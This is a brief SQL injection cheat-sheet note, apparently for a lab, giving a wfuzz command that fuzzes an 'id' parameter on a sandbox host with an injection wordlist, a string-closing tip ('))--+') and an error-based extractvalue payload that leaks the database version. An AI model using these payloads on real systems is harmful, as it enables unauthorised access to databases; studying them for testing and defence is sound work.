Use the following:

wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -d "db=mysql&id=FUZZ" -u http://sql-sandbox/api/intro

To properly close string remember to use ), for example '))--+

Sometimes (especially after sort by), can use comma to inject. For example , extractvalue('',concat('>',version()))